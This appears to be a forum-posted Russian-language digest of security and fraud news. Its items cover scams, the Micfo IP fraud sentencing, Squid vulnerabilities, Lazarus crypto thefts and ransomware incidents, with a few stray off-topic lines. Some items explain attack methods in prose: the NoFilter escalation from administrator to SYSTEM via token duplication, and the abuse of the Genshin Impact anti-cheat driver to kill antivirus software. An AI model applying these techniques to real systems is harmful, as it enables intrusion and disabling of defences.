В апреле текущего года для легкого заработка парень решил воспользоваться уже «рабочей» схемой. Для этого он в мессенджере нашел сообщение о подработке, после чего в ходе переписки с пользователем понял, что необходимо создать аккаунт на криптоплатформе, за что ему пообещали своевременную оплату. Учащийся колледжа создал криптокошелек, а реквизиты, необходимые для входа в аккаунт криптовалютной биржи, сообщил злоумышленникам. После чего его заблокировали, так и не перечислив сумму, обещанную за предоставление информации.
Окончательная правовая оценка действиям фигуранта будет дана по результатам расследования.
• Source: sk.gov.by/ru/news-usk-grodno-ru/view/prodazha-rekvizitov-platezhnyx- sredstv-vozbuzhdenie-ugolovnogo-dela-13238
Интернет-мошенник в Узбекистане взыскивал штрафы с любителей смотреть видео категории 18+.
Ценители фильмов для взрослых покупались на фейковые ссылки, где получали уведомления якобы от лица сотрудников Центра по борьбе с киберпреступностью при МВД Узбекистана.
"Вы заблокированы за просмотр педофилии и материалов насилия. За разблокировку заплатите штраф 350.000 сумов на гос. карту", — гласило сообщение.
Click to expand...
Многие интернет-пользователи переводили сумму на неизвестный счёт, будучи уверенными в том, что платят штраф государству.
По иноформации СМИ Узбекистана, менее чем за неделю аферист "оштрафовал" 405 падких на порнофильмы узбекистанцев более чем на 1 миллион рублей.
В пригороде Чикаго (штат Иллинойс) жертвой мошенников стал 85-летний священнослужитель Роберт Банзин (Robert Banzin). Он попался на удочку из-за фишингового сайта PayPal.
Все началось с электронного письма, которое преподобный получил, как он полагает, от PayPal. При этом внятно объяснить его содержание журналистам священник не смог, но вспомнил, что там упоминался eBay. Банзин сделал вывод, что платежная система пытается предупредить его о каком-то мошенничестве и просто погуглил их сайт.
Однако, как оказалось, поисковая выдача начиналась с рекламы фишингового сайта, на котором были отображены мошеннические номера поддержки. На другом конце провода Банзину подтвердили все его опасения и порекомендовали обратиться к следователям, которых сам фишинговый PayPal и предоставил.
В итоге священника взяли в оборот и в течение следующих нескольких недель «следователи» завоевывали доверие пожилого американца. В итоге они убедили его перевести все свои сбережения на «безопасный счет», что он и сделал, потеряв 61 тысячу долларов. После этого мошенники, понятное дело, пропали.
Игра с IP-адресами принесла предпринимателю известность и годы за решёткой.
Генеральный директор IT-компании Micfo LLC, базирующейся в Чарльстоне, Южная Каролина, 40-летний Амир Голестан был приговорен к 5 годам тюрьмы по статье за мошенничество с использованием средств электронной связи. Приговор вынесен почти через 2 года после того, как Голестан признал свою вину в использовании сложной сети фиктивных компаний для получения более 735 000 интернет-адресов от Американского реестра интернет-номеров (American Registry for Internet Numbers, ARIN) – некоммерческой организации, которая контролирует выдачу IP- адресов в США, Канаде и части Карибских островов.
В 2018 году ARIN подал в суд на Голестана и Micfo LLC, утверждая, что они получили сотни тысяч IP-адресов под ложными предлогами. ARIN и Micfo урегулировали спор через арбитраж, и Micfo вернул большую часть адресов, которые компания ещё не продала.
Дело ARIN привлекло внимание федеральных прокуроров Южной Каролины. В мае 2019 года Голестану были предъявлены уголовные обвинения в мошенничестве с использованием средств электронной связи. Обвинение утверждало, что он создал сеть фиктивных компаний и ложных личностей, чтобы предотвратить распознавание ARIN того, что все адреса идут одному покупателю.
Прокуроры показали, что каждая из фиктивных компаний производила заверенные у нотариуса доверенности на имена несуществующих людей. В результате Голестан был обвинен в 20 эпизодах мошенничества — по одному за каждый платеж, произведенный фиктивными компаниями.
Сначала Голестан пытался бороться с обвинениями, но уже на второй день суда в ноябре 2021 года он передумал и признал свою вину. Прокуратура оценила стоимость IP-адресов между $10 млн. и $14 млн.
ARIN указала в своём заявлении, что 5-летний срок, который вынес суд Южной Каролины, содержит в себе «важное предупреждение другим сторонам, размышляющим о мошеннических схемах для получения или передачи интернет-ресурсов».
К 2013 году ряд клиентов Micfo попали в поле зрения компании Spamhaus, которая помогает многим крупным организациям противодействовать спаму по электронной почте. Вскоре после того, как Spamhaus начал блокировать диапазоны IP-адресов Micfo, Micfo изменила направление и начала перепродавать IP-адреса в основном компаниям, предоставляющим услуги VPN.
В интервью KrebsOnSecurity в 2020 году Голестан заявил, что в какой-то момент Micfo «отвечала за посредничество» примерно 40% IP-адресов, используемых крупнейшими в мире VPN-провайдерами. Голестан тогда объяснил, что создание фиктивных компаний было необходимо для того, чтобы такие организации, как Spamhaus, в дальнейшем «не вмешивались в его бизнес».
Менее 4 млрд. миллиардов IPv4-адресов доступно для использования, но большинство из них уже выделено. Глобальное сокращение доступных IP-адресов превратило их в товар, стоимость каждого адреса IPv4 может достигать от $15 до $25 на открытом рынке.
Департамент юстиции США заявляет, что Голестан проведет 5 лет в тюрьме, после чего будет 2 года под судебным надзором. Также генеральному директору Micfo было приказано заплатить почти $77 000 в пользу ARIN за их помощь федеральным прокурорам.
source:
krebsonsecurity[.]com/2023/10/tech-ceo-sentenced-to-5-years-in-ip-address-
scheme
arin.net/blog/2023/10/16/micfo-golestan-sentencing
Опубликованы результаты независимого аудита безопасности открытого кэширующего прокси-сервера Squid, проведённого в 2021 году. В ходе проверки кодовой базы проекта выявлено 55 уязвимостей, из которых в настоящее время 35 проблем пока не исправлены разработчиками (0-day). Разработчики Squid были уведомлены о проблемах ещё два с половиной года назад, но так и не завершили работу по их устранению. В конечном счёте автор аудита решил раскрыть информацию не дожидаясь исправления всех проблем и предварительно уведомил об этом разработчиков Squid.
Среди выявленных уязвимостей:
• [Переполнение стека](https://megamansec.github.io/Squid-Security- Audit/digest-overflow.html) в реализации аутентификации по хэшу (Digest Authentication), проявляющееся при обработке HTTP-заголовка Proxy- Authorization со слишком большим значением поля "Digest nc".
• [Обращение к памяти после её освобождения](https://megamansec.github.io/Squid-Security-Audit/trace- uaf.html) в обработчике запросов с методом TRACE.
• [Обращение к памяти после её освобождения](https://megamansec.github.io/Squid-Security-Audit/range- uaf.html) при обработке HTTP-запросов с заголовком "Range" (CVE-2021-31807).
• [Переполнение стека](https://megamansec.github.io/Squid-Security-Audit/xff- stackoverflow.html) при обработке HTTP-заголовка X-Forwarded-For.
• [Переполнение стека](https://megamansec.github.io/Squid-Security- Audit/chunked-stackoverflow.html) при обработке chunked-запросов.
• [Обращение к памяти после её освобождения](https://megamansec.github.io/Squid-Security-Audit/cache- uaf.html) в web-интерфейсе CacheManager.
• [Целочисленное переполнение](https://megamansec.github.io/Squid-Security- Audit/range-assert-int.html) в обработчике HTTP-заголовка Range (CVE-2021-31808).
• [Обращение](https://megamansec.github.io/Squid-Security-Audit/esi-uaf- crash.html) к [памяти](https://megamansec.github.io/Squid-Security-Audit/esi- uaf.html) после её освобождения и переполнение буфера в обработчике выражений ESI (Edge Side Includes).
• Многочисленные утечки памяти, выходы за границы буфера при чтении и проблемы, приводящие к аварийному завершению.
Security Enhanced Linux (SELinux) уже два десятилетия входит в состав основного ядра в качестве модуля безопасности, реализующего политики контроля доступа, и в настоящее время широко используется для повышения уровня безопасности производственных Linux-серверов и других систем. Те, кто давно не работает с Linux, могут не знать, что SELinux был разработан Агентством Национальной Безопасности США (АНБ). Но теперь, в Linux 6.6, ссылки на АНБ удаляются.
Агентство Национальной Безопасности США работало над первоначальным кодом Security Enhanced Linux и было основным разработчиком. На протяжении многих лет АНБ продолжало вносить свой вклад в развитие SELinux, а с ростом его распространенности в него стали вкладывать средства самые разные люди и организации.
В связи с тем, что за последнее десятилетие в отношении АНБ было много различных скандалов в прессе, некоторые энтузиасты open-source ставят под вопрос участие АНБ в SELinux и высказывают другие критические замечания. Несмотря на то, что разработчики из АНБ продолжают участвовать в SELinux, начиная с версии Linux 6.6 упоминания "АНБ" исчезают — отчасти для того, чтобы показать, что это не дело только АНБ.
В части патча, озаглавленной "selinux: de-brand SELinux", удалены ссылки на АНБ.
Сегодня был отправлен SELinux pull request с добавлением уведомления о том, является ли виртуальная память исполняемой по умолчанию, новыми помощниками сетевого аудита, улучшением различных средств защиты и многим другим. Мое внимание привлекло следующее:
– Небольшие административные изменения
Стивен Смолли обновил свой адрес электронной почты и "дебрендировал" SELinux с
"NSA SELinux" на просто "SELinux". Мы прошли долгий путь от первоначального
представления NSA, и на данный момент я считаю SELinux настоящим проектом
сообщества, поэтому отказ от бренда NSA просто имеет смысл.
Патч, удаляющий ссылки на "NSA" из кода SELinux и текста Kconfig, добавляет:
**
В тексте справки и комментариях к Kconfig изменить "NSA SELinux" на просто
"SELinux". Хотя АНБ было первоначальным разработчиком и продолжает помогать в
поддержке SELinux, SELinux уже давно перешел к широкому сообществу
разработчиков и сопровождающих. SELinux является частью основного ядра Linux
уже почти 20 лет и получил вклад от многих людей и организаций.**
Так, в Linux 6.6, после примерно двух десятилетий пребывания в ядре, больше не существует ссылок на NSA SELinux.
Специалист компании Deep Instinct Рон Бен Ицхак (Ron Ben Yizhak) представил на конференции Defcon новую [атаку NoFilter](https://www.deepinstinct.com/blog/nofilter-abusing-windows- filtering-platform-for-privilege-escalation), которая опирается на Windows Filtering Platform ([WFP](https://learn.microsoft.com/en- us/windows/win32/fwp/windows-filtering-platform-architecture-overview)) для повышения привилегий в Windows.
Как объясняет эксперт, если у злоумышленника уже есть возможность выполнять код с правами администратора, но его целью является выполнение, например, LSASS Shtinkering, таких привилегий будет недостаточно, потребуется запуск как NT AUTHORITY\SYSTEM. В таком случае атака NoFilter позволит перейти от прав администратора к SYSTEM.

Отправной точкой для этого исследования послужил собственный инструмент
компании под названием RPC Mapper, который используется для сопоставления
методов удаленного вызова процедур (remote procedure call, RPC), особенно тех,
которые вызывают WinAPI. Он
привел к обнаружению метода BfeRpcOpenToken, который является частью WFP.
Напомним, что WFP представляет собой набор API и системных сервисов, которые используются для обработки сетевого трафика и позволяют настраивать фильтры, разрешающие или блокирующие коммуникации.
«Таблицу дескрипторов (handle table) другого процесса можно получить, вызвав [NtQueryInformationProcess](https://learn.microsoft.com/en- us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess), — объясняет эксперт. — В этой таблице перечислены токены, удерживаемые процессом. Дескрипторы этих токенов могут быть продублированы, чтобы другой процесс мог повысить права до SYSTEM».
Click to expand...
Таким образом, вредоносная программа, работающая в user mode, имеет возможность получить доступ к токенам других процессов, используя определенные функции (например, DuplicateToken или DuplicateHandle), а затем использовать токен для запуска дочернего процесса с привилегиями SYSTEM.
При этом такая атака может быть скрытной и не оставит после себя практически никаких следов и логов, но NoFilter поможет запустить новую консоль как NT AUTHORITY\SYSTEM, или под видом другого пользователя, вошедшего в систему.
Рон Бен Ицхак резюмирует, что новые векторы атак можно найти даже просто изучив встроенные компоненты ОС, такие как WFP.
Также в отчете отмечается, что компанию Microsoft заранее уведомили об этой проблеме, однако там сочли, что описанное поведение уязвимостью не является.
Из-за санкций подобные услуги востребованы в госкомпаниях.
Отечественные компании и госорганы продолжают покупать лицензии американской корпорации Cisco, несмотря на ее уход с российского рынка. В некоторых случаях пиратские лицензии продаются открыто.
Помимо продажи пиратских лицензий, известны случаи, когда госорган взломал продукт Cisco c помощью внешней компании. Покупка лицензий осуществляется в том числе и за криптовалюту.
Одной из компаний, свободно продающей лицензий Cisco, является российский интегратор «Рамэк-ВС». Услугу под названием UNLIC компания предоставляет открыто и называет ее «возвращением стабильности инфраструктуры Cisco».

Интегратор гарантирует полную конфиденциальность и отсутствие правовых рисков в российском правовом поле. В услугу компании также включены обновление ПО, а также восстановление и перенос лицензий. Компания работает с продуктами Cisco Security, Cisco Unified Communications, Cisco R&S и Splunk.

По мнению экспертов издания, воспользоваться продуктом Сisco можно 2 способами.
Совершить хакерские действия над прошивками и лицензиями Сisco, либо компания их регистрирует в других странах и устанавливает на российское оборудование в обход запретов Cisco.
Как пишет издание, подобные услуги востребованы в госкомпаниях, так как они под санкциями и не могут ничего сделать с обновлениями и продлениями лицензий.
Напомним, что 23 июня Cisco решил полностью уйти из России и Беларуси. Компания закроет все представительства и прекратит сотрудничество с клиентами и поддержку.
«Cisco прекращает все деловые операции, включая продажи и предоставление услуг в России и Беларуси на обозримое будущее», — пояснила компания.
source: cnews.ru/news/top/2022-07-12_v_rossii_prodolzhayut_zakupat
Основываясь на характере взлома и отмывания средств, специалисты предположили,
что за атакой может стоять группировка Lazarus.
Ответственность за масштабную кибератаку на одну из американских
криптовалютных компаний, в результате которой была похищена криптовалюта на
$100 млн, предположительно лежит на северокорейских хакерах. К такому выводу
пришли специалисты сразу трех ИБ-компаний, пишет Reuters.
Криптовалюта была похищена 23 июня нынешнего года у Horizon Bridge – сервиса, управляемого блокчейном Harmony и позволяющего переводить криптовалютные активы на другие блокчейны.
Судя по дальнейшей активности киберворов, они имеют отношение к КНДР. Вероятно, похищенные средства пойдут на финансирование ядерной программы Пхеньяна, который, как известно, со всех сторон обложен санкциями.
Стиль атаки и скорость перевода похищенных средств в миксер (сервис, позволяющий скрыть происхождение денег), совпадают с предыдущими атаками северокорейских хакеров, сообщили специалисты блокчейн-компании Chainalysis, помогающей Harmony в расследовании инцидента.
«Судя по тому, как были проведены транзакции, пока что это напоминает работу северокорейских хакеров», - сообщил бывший аналитик ФБР, в настоящее время расследующий кражу криптовалюты хакерами из КНДР у американской компании TRM Labs.
Основываясь на характере взлома и последующего отмывания средств, специалисты компании Elliptic предположили, что за атакой может стоять нашумевшая северокорейская хакерская группировка Lazarus.
Если ответственность за взлом Horizon Bridge действительно лежит на хакерах из КНДР, то это будет уже восьмое киберограбление, осуществленное северокорейцами в нынешнем году. В общей сложности в результате этих атак злоумышленники похитили $1 млрд – 60% от всех похищенных в 2022 году денег.
В предварительных билдах Windows 11 Microsoft избавилась от WMIC
Microsoft постепенно отказывается от инструмента Windows Management
Instrumentation Command-line (WMIC), позволяющего выполнить WMI-сценарий в
командной строке. В последних на данный момент предварительных сборках Windows
11 разработчики избавились от wmic.exe.
С помощью WMIC системные администраторы могли отправлять операционной системе
запросы на предоставление подробной информации об аппаратной составляющей и
настройках Windows. Помимо этого, встроенная Microsoft программа позволяла
запускать задания и даже выполнять отдельные приложения или команды.
В прошлом году корпорация из Редмонда сообщила, что wmic.exe постепенно будет
входить в ряд устаревшего софта, а его место полностью займёт Windows
PowerShell. Тогда речь шла о подобных нововедениях в ОС Windows Server.
Теперь отдельные исследователи сообщают об удалении WMIC из Windows-клиентов,
начиная с предварительны билдов Windows 11, которые в настоящий момент
опубликованы в канале для разработчиков.
Стоит отметить, что киберпреступники часто использовали WMIC в реальных
атаках. Эта программа принадлежит к классу LoLBins — исполняемым файлам,
подписанным Microsoft и помогающим злоумышленникам избежать детектирования при
выполнении вредоносных операций.
Например, операторы программы-вымогателя часто использовали команду WMIC для
удаления теневых копий, чтобы жертвы точно не смогли восстановить
зашифрованные файлы. С удалением WMIC часть таких векторов кибератак просто
отпадёт, поэтому нельзя не признать, что Microsoft движется в правильном
направлении.
**
Источник:https://www.anti-malware.ru/news/2022-02-11-111332/38162**
Хакеры нарушили поставку фруктов в бельгийском порту
Взлом нарушил работу IT-систем в каждом порту, которым управляет компания Sea- Invest в Европе и Африке.
Прокуратура Антверпена (Бельгия) начала расследование кибератаки на управляющую портовым терминалом Гента (Бельгия) компанию SEA-Invest.
По данным BBC News, взлом произошел несколько дней назад, нарушив работу IT- систем в каждом порту, которым управляет Sea-Invest в Европе и Африке. Инцидент затронул нефтяные терминалы, а также системы поставщика фруктов Belgian New Fruit Wharf в Антверпене.
Belgian New Fruit Wharf контролирует фруктовые терминалы в Антверпене, Гамбурге и Зебрюгге, обрабатывая большие объемы поставок бананов, киви и ананасов.
По словам ИБ-экспертов из Secutec, атака была вызвана «мощной программой- вымогателем», установленной хакерской группировкой. Sea-Invest смогла в значительной степени ограничить ущерб, своевременно приняв необходимые превентивные меры.
Атака не затронула резервные копии данных компании Sea-Invest, поэтому у Secutec есть возможность восстановить системы с использованием существующих компонентов.
Примечания
Дополнительная информация об обновлениях сети и хард-форке:
Source: https://www.binance.com/ru/support/announcement/485c2c5a5f044875a7423f0af5c7e5ba
Родственники из Зеленограда провели более 3 тыс. незаконных валютных операций.
Как стало известно “Ъ”, в Зеленограде правоохранители раскрыли необычную банковскую аферу. Трое местных жителей подкупили молодых менеджеров отделения Райффайзенбанка и, пользуясь полученными от них данными об изменении курса, проводили операции по покупке и продаже валюты. Используя онлайн-приложение кредитного учреждения, они получили доход почти в 100 млн руб. Однако около 3,5 тыс. похожих операций вызвали подозрения у сотрудников управления экономической безопасности банка, которые и обратились к правоохранителям.
Трех организаторов незамысловатой, но весьма прибыльной «конверсионной» махинации следователи СКР в рамках возбужденного уголовного дела о незаконной банковской деятельности, совершенной организованной группой (ч. 2 ст. 172 УК РФ), предложили заключить под домашние аресты. Соответствующие ходатайства были направлены в Зеленоградский райсуд Москвы в отношении трех мужчин — членов одной семьи. Однако судья удовлетворил просьбу следствия только в отношении одного из них, чья роль очевидно являлась ведущей. Впрочем, и это решение суда уже обжаловано.
По версии участников расследования из СКР и полиции, преступная семейная группа действовала как минимум с августа прошлого года. Мужчин интересовало «систематическое информирование об установлении новых курсов иностранной валюты с последующим внеочередным проведением конверсионных операций по кассовому курсу». Выбор аферистов пал на зеленоградское отделение АО «Райффайзенбанк», где они смогли найти общий язык с несколькими сотрудниками.
Click to expand...
Последние передавали за относительно небольшое вознаграждение закрытые данные о внутренних приказах руководства «Об установлении курсов продажи наличной иностранной валюты».
Махинаторы проводили в зеленоградском офисе банка в корпусе 828 на Солнечной аллее «конверсионные», то есть «обменные» операции по покупке валюты. Затем деньги продавались в онлайн-приложении кредитного учреждения, а вскоре эти нехитрые операции повторялись снова. Всего за месяц было проведено не менее 3332 подобных операций, а доход семьи аферистов, по первоначальным подсчетам следствия, составил почти 95 млн руб.
По данным источников “Ъ”, сначала удалось вычислить самих махинаторов, двух из которых, несмотря на то что вменяемая им статья УК предусматривает до семи лет лишения свободы, суд счел возможным не ограничивать даже в передвижениях.
Click to expand...
А в начале этой недели наконец сыщики установили личности и их помощников. Ими оказались трое менеджеров зеленоградского отделения Райффайзенбанка. Всех их подозревают в получении коммерческого подкупа (ст. 204 УК РФ), поскольку за вознаграждение они передавали сторонним лицам информацию, которая «не является общедоступной», а обладание этими данными «ставит сотрудника банка в силу своего служебного положения или должностных обязанностей в преимущественное положение». А использовались данные банковскими служащими «с целью незаконного личного обогащения».
Сколько именно получили клерки, пока точно не установлено.
Однако известно, что речь идет о второй части статьи о коммерческом подкупе, которая предусматривает ответственность за подобные деяния в «значительном размере». Между тем примечание к ст. 204 УК РФ уточняет, что за такой формулировкой скрываются суммы в размере от 25 тыс. до 100 тыс. руб. При этом наказание за такое преступление варьируется от относительно небольшого штрафа до трехлетнего срока. Впрочем, пока все трое подозреваемых финансистов остаются на свободе под подписками о невыезде.
В пресс-службе Райффайзенбанка “Ъ” сообщили, что именно сотрудники управления экономической безопасности банка обнаружили подозрительные операции, определили причастных к ним лиц и обратились в правоохранительные органы. «Сейчас мы активно сотрудничаем с ними, предоставляя всю необходимую помощь в расследовании»,— отметили в кредитном учреждении.
СБУ и сотрудники Киберполиции нейтрализовали преступную организацию, которая массово выманивала деньги с банковских карточек украинцев.
«На счету» злоумышленников почти 70% всех мошенническим схем, которые когда- либо применялись к одному из ведущих госбанков Украины. При этом количество обманутых клиентов составляет десятки тысяч пострадавших.
По данным следствия, участниками схемы было почти 30 заключенных Винницкой колонии. Отбывая сроки в тюрьме, они обзванивали вкладчиков финучреждений и под видом предоставления онлайн услуг похищали у них средства.
Установлено, что незаконную деятельность организовал так называемый «смотрящий» за одной из исправительных колоний Винницкой области, заключенный- уголовник по прозвищу «Геша».
К незаконной деятельности он привлек до 30 человек, большинство из которых отбывали «сроки» в тюрьме, или их сообщников, которые уже вышли «на свободу».
Фигуранты звонили клиентам банка и представлялись «сотрудниками службы безопасности» финучреждения. Во время таких разговоров злоумышленники сообщали вкладчикам, что их расчетные карточки якобы пытаются взломать мошенники.
Затем злоумышленники предлагали гражданам перевести средства на так называемый «счет безопасности» через онлайн-приложение, чтобы «уберечь сбережения от похитителей».
Таким образом фигуранты вводили потерпевших в заблуждение и заставляли их переводить свои деньги на подконтрольные банковские счета мошенников. После этого их сообщники «на свободе» снимали наличные и передавали их в «воровскую кассу».
Во время 27 одновременных обысков по местам пребывания участников группировки изъято:
мобильные телефоны, ноутбуки, sim-карты операторов мобильной связи и черновые записи, которыми пользовались злоумышленники;
банковские карты и деньги, добытые преступным путем.
На основании собранных доказательств 10 злоумышленникам сообщено о подозрении по разным статьям Уголовного кодекса Украины:
2 лицам - по ч. 2 ст. 255-1 (установление и распространение преступного влияния, совершенное в учреждениях исполнения наказаний), ч. 4 ст. 190 (мошенничество);
1 лицу - по ч. 5 ст. 255 (создание, руководство преступной организацией собой, которое находится в статусе субъекта повышенного преступного влияния, в том числе в статусе «вора в законе», ч. 4 ст. 190 (мошенничество);
7 лицам - по ч. 4 ст. 190 (мошенничество).
Пятеро злоумышленников задержаны, еще пятеро фигурантов-заключенных - переведены в дисциплинарный изолятор исправительного учреждения. Кроме того, решается вопрос относительно сообщения о подозрении еще 17 участникам преступной организации.
Комплексные мероприятия по ликвидации мошеннической схемы проводили сотрудники СБУ в Харьковской области совместно с Национальной полицией при процессуальном руководстве Офиса Генерального прокурора.
• Video: https://www.facebook.com/watch/UA.National.Police/?ref=embed_video
В Санкт-Петербурге возбуждено уголовное дело по факту обмана инвесторов проекта TORestate. Следствие оценивает ущерб в 78 млн рублей, сами пострадавшие — в 500 млн.
Создатель TORestate Андрей Петрунькин брал у инвесторов средства, обещая 18–39% годовых, сам ссуживал эти деньги другим людям под еще большие проценты якобы под залог их недвижимости.
В какой-то момент выплаты инвесторам прекратились, и около 200 человек обратились в полицию. Тогда и выяснилось, что договоры залога недвижимости оказались недействительными, а сам Петрунькин подал на банкротство.
25 лет назад два студента решили изменить интернет.
Самый популярный в мире поисковик Google отмечает свое 25-летие в понедельник. Google был создан как научный проект Ларри Пейджем и Сергеем Брином, когда они были аспирантами Стэнфордского университета в конце 1990-х.
Работая в своих общежитиях, Пейдж и Брин разработали новый алгоритм для поисковых систем, который оценивал веб-сайты на основе количества других сайтов, ссылающихся на них. Этот алгоритм получил название PageRank и оказался гораздо эффективнее существующих алгоритмов. Благодаря этому Google быстро стал самым популярным поисковиком в интернете.
В прошлом месяце доля рынка Google составляла около 92%. Ее ближайший конкурент, Bing, занимал около 3% рынка, а Yahoo – чуть более 1%.
Название Google происходит от математического термина "googol", который обозначает число 1, за которым следует 100 нулей. Этот выбор отражает намерение основателей систематизировать огромное количество информации.
На протяжении лет поисковая система Google стала неотъемлемой частью нашей повседневной жизни, формируя способы, которыми мы ищем, общаемся и взаимодействуем с информацией в сети.
В 2006 году Oxford Dictionary включил слово "google" как глагол, означающий поиск информации в интернете, независимо от используемого поисковика. В том же году была запущена платформа Google Trends, которая предоставляет возможность увидеть тренды поисковых запросов в мире. Каждый год Google публикует свой отчет "Год в поиске", отражающий наиболее актуальные события, личности и тренды.
На этой неделе представители ФБР [предупредили](https://www.fbi.gov/news/press-releases/fbi-identifies- cryptocurrency-funds-stolen-by-dprk), что северокорейские хакеры, похоже, готовы обналичить криптовалюту на сумму около 40 миллионов долларов США, украденную за последний год.
«За последние 24 часа ФБР отследило криптовалюту, украденную злоумышленниками из КНДР, связанными с TraderTraitor (также известными как Lazarus и APT38), — заявляют правоохранители. — ФБР полагает, что КНДР может попытаться обналичить биткоины на сумму более 40 миллионов долларов».
Click to expand...
В ходе расследования американские правоохранительные органы обнаружили перемещение примерно 1580 биткоинов, украденных в ходе предыдущих атак Lazarus, на шесть криптовалютных кошельков:
• 3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG;
• 39idqitN9tYNmq3wYanwg3MitFB5TZCjWu;
• 3AAUBbKJorvNheUFhKnep9YTwmZECxE4Nk;
• 3PjNaSeP8GzLjGeu51JR19Q2Lu8W2Te9oc;
• 3NbdrezMzAVVfXv5MTQJn4hWqKhYCTCJoB;
• 34VXKa5upLWVYMXmgid6bFM4BaQXHxSUoL.
Теперь всем криптовалютным компаниям рекомендуется следить за этими адресами с помощью блокчейн-анализа, и проявлять осторожность, предотвращая транзакций непосредственно связанные с этими адресами и с криптовалютой, полученной из них, как прямо, так и косвенно.
Интересно, что предупреждение ФБР было опубликовано вскоре после отчета компании TRM Labs, по данным специалистов которой, с 2018 года северокорейские хакеры похитили более 2 миллиардов долларов в криптовалюте в рамках серии из 30 атак. При этом только в 2023 году было похищено более 200 миллионов долларов.
[](https://xakep.ru/wp-
content/uploads/2023/08/433872/64df2cb083c1605d101b7546_jX4cSYctIPJw7XRSs0vvhlHFnwJDkB4xSTvrUVPF5X6zMVNGl4Q3RUnlo0MXL_lyEPS7ByYFt23AbJmp3GcBHam3BqDHP1najqjqKkPVqZdasPB-
UohCsQiJNBiqOuiwYEGVHHZsuUgiTX1yRjRiyc4.png)
Source: https://xakep.ru/2023/08/25/lazarus-crypto/
Сетевая безопасность старых частей популярной франшизы Call of Duty уже стала своеобразным мемом в игровом сообществе. Проблема до безобразия абсурдна: простые читеры, коих немало и в других онлайн-играх, благодаря кривому сетевому коду Call of Duty способны не только играть на нервах честных игроков, но и заражать их компьютеры реальными вирусами. А это уже не просто разгромное поражение и испорченный вечер.
Игроки оригинальной Call of Duty Modern Warfare 2, вышедшей в далёком 2009 году, до сих пор предпочитают заходить вечерами в игру своего детства, игнорируя современные игры серии. Как раз таких любителей поностальгировать в мультиплеере поджидают подлые читеры, способные распространять вирус-червь прямо в онлайн-лобби перед загрузкой матча.
26 июня пользователь под ником «Bee» создал на форуме Steam отдельный топик с обсуждением данной проблемы. «Убедитесь, что у вас есть антивирусный сканер, прежде чем открывать эту игру. Они атакуют с помощью взломанных лобби путём подмены dsound.dll», — предупреждает игрок.
Другой представитель геймерского сообщества даже проанализировал вредоносное ПО и написал в той же теме форума, что оно является червём, основываясь на ряде текстовых строк внутри кода вредоноса. Черви, как известно, способны самораспространяться, автоматически заражая другие компьютеры.
Свежие образцы вышеупомянутого червя регулярно загружаются на VirusTotal. Пока что их определяют лишь 4 антивирусных модуля из 70.
Вчера в официальном аккаунте Call of Duty в Twitter * было опубликовано сообщение о том, что «мультиплеер Call of Duty: Modern Warfare 2 (2009) в Steam был отключён на время расследования», что подтверждает наличие проблемы с вредоносным программным обеспечением.
Хотя сама концепция распространения вредоносного ПО через видеоигры далеко не нова, обычно это происходит через троянизированные версии установщиков игр или «палёные» читы, скачанные с крайне сомнительных сайтов. Поэтому до конца неясно, как именно злоумышленникам удаётся принудительно заражать чужие компьютеры прямо через игровое лобби.
Впрочем, это уже не первый случай, когда хакеры производили какие-либо манипуляции с компьютерами простых игроков Call of Duty. О последнем таком случае мы сообщали в начале марта. И именно из-за того, что подобное происходит только с серией Call of Duty, многие игроки даже начали относиться к такого рода ситуациям с юмором.
Call of Duty: Modern Warfare 2 была выпущена компанией Activision в 2009 году, однако всё ещё имеет небольшое сообщество преданных игроков. Согласно сайту SteamDB, средний онлайн данной части серии на момент публикации поста составляет порядка 600 человек.
Компания Valve, отвечающая за платформу Steam, через которую и распространяется Call of Duty, никак не комментировала данную ситуацию. Однако вряд ли компания может сделать нечто большее, чем просто временно скрыть игру из магазина или помешать её запуску в целях безопасности игроков.
Основная инициатива должна исходить именно от Activision, а как мы уже хорошо знаем, исправлять косяки старых игр серии — вообще не то занятие, на которое хочет тратить своё время скандально известная компания.
Магаданца 39-ти лет дважды обманули мошенники, причем разные. Как сообщили в полиции города, мужчина рассказал, что в марте вкладывал свои деньги, играя на бирже, но вернуть обратно их не удалось.
Вскоре в интернете он наткнулся на рекламу юридической фирмы, которая предоставляет услуги по выведению дохода с брокерских сайтов.
Связавшись с сотрудником компании, колымчанин перечислил свыше 140 тысяч рублей в счет оказания услуг. Не получив результата, заявитель понял, что попался на уловку других мошенников.
Уязвимость в античит-системе приводит к атаке программы-вымогателя.
Хакеры используют античит-систему популярной игры Genshin Impact, чтобы
отключить антивирусное ПО при проведении атак программ-вымогателей.
Античит-драйверу игры «mhypro2.sys» содержит уязвимость, которая позволяет злоумышленнику отключить систему безопасности. Более того, драйверу не нужна целевая система для установки игры, и он может работать независимо или даже быть встроенным во вредоносное ПО, позволяя злоумышленнику отключить систему безопасности.
Уязвимость драйвера [известна с 2020 года](https://www.unknowncheats.me/forum/anti-cheat- bypass/419457-mhyprot2-read-process-kernel-memory-valid-signature- driver-2.html) и дает доступ к памяти любого процесса/ядра и возможность завершать процессы, используя самые высокие привилегии.
В [новом отчете](http://www.trendmicro.com/en_us/research/22/h/ransomware- actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html) Trend Micro исследователи обнаружили, что злоумышленник использует уязвимость драйвера с конца июля 2022 года для отключения защиты устройств.
Киберпреступник подключился к контроллеру домена через RDP, используя украденные учетные данные администратора. Затем он перенес «mhyprot2.sys» на рабочий стол вместе с вредоносным исполняемым файлом «kill_svc.exe», который используется для установки драйвера.
Хакер загрузил драйвер, программу-вымогатель и исполняемый файл «kill_svc.exe»
в общий сетевой ресурс для массового развертывания, чтобы заразить больше
рабочих станций.
Trend Micro не сообщила, какие программы-вымогатели использовались в этих
атаках.
Trend Micro предупреждает, что хакеры могут активно использовать античит- драйвер даже после исправления уязвимости, поскольку его старые версии будут продолжать распространяться.
Исследователь безопасности Кевин Бомонт сообщает, что администраторы могут
защититься от этой угрозы, заблокировав хэш
«0466e90bf0e83b776ca8716e01d35a8a2e5f96d3» в своем решении безопасности,
который соответствует уязвимому драйверу «mhypro2.sys».
Также ИБ-специалисты должны отслеживать журналы событий для конкретной
установки службы с именем «mhyprot2».
Подробнее:
https://www.securitylab.ru/news/533562.php
ну че пацаны, аниме?
Европейский финетех сектор стал объектом особых устремлений со стороны APT EvilNum (отслеживается как TA4563) которая использует одноименное вредоносное ПО для нападения на европейские финансовые и инвестиционные организации.
